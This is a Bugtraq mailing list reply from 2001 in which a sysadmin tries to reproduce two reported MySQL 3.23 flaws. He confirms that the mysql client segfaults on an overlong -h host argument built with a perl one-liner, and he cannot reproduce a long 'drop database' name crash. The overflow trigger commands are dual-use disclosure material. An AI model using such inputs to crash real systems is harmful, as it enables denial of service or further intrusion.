Bugtraq mailing list archives
Re: Some more MySql security issues
From: Theodor Milkov <zimage () DELBG COM>
Date: Mon, 12 Feb 2001 11:40:27 +0200
On Sat, Feb 10, 2001 at 12:54:33AM -0000, Joao Gouveia wrote:
Hi, MySql staff has been notified regarding this issues on 2001-01-26. There still are some potential security flaws with MySql lastest stable release. Follows some tests i've made all with: MySql v3.23.32 PHP v4.0.4pl1 (static) apache-1.3.14
And my results on: 1. MySQL v3.23.31 Slackware-7.1 (glibc-2.1.3) 2. MySQL v3.23.31 Slackware-3.4 (libc5 + gcc-2.95.2)
Problem 1.
<cut>
mysql> drop database AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; </quote>
<cut> It seems I'm unable to reproduce this either on 3.4 and 7.1: mysql> drop database -> [2048 A's]; ERROR 1102: Incorrect database name 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
Problem 2. ----------- MySql client that ships with the MySql package has a buffer overflow situation on the "host" user suplied input. ( among other paramaters, but this one can be critical )
<cut>
/home/jroberto/httpd/mysql/bin/mysql -h`perl -e'printf("A"x200)'` Program received signal SIGSEGV, Segmentation fault.
<cut> mysql -h`perl -e'printf("A"x200)'` Segmentation fault This one works on 3.4 as well on 7.1. -- =- --rw------- =--=--=--=--=--=--=--=--=--=--=--=--=--= Theodor Milkov Administrator IP Networks Davidov Electric Ltd. Phone: +359 (2) 730158 PGP: http://www.zimage.delbg.com/zimage.asc =--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=
Attachment:
_bin
Description:
Current thread:
- Some more MySql security issues Joao Gouveia (Feb 10)
- Re: Some more MySql security issues Konrad Rieck (Feb 12)
- Re: Some more MySql security issues Tim Yardley (Feb 12)
- Re: Some more MySql security issues Konrad Rieck (Feb 12)
- Re: Some more MySql security issues Joao Gouveia (Feb 13)
- Re: Some more MySql security issues Tim Yardley (Feb 13)
- Re: Some more MySql security issues Tim Yardley (Feb 12)
- Re: Some more MySql security issues Peter van Dijk (Feb 12)
- Re: Some more MySql security issues Carsten H. Pedersen (Feb 12)
- Re: Some more MySql security issues Konrad Rieck (Feb 12)
- Re: Some more MySql security issues Theodor Milkov (Feb 12)
- <Possible follow-ups>
- Re: Some more MySql security issues Hector A.Paterno (Feb 13)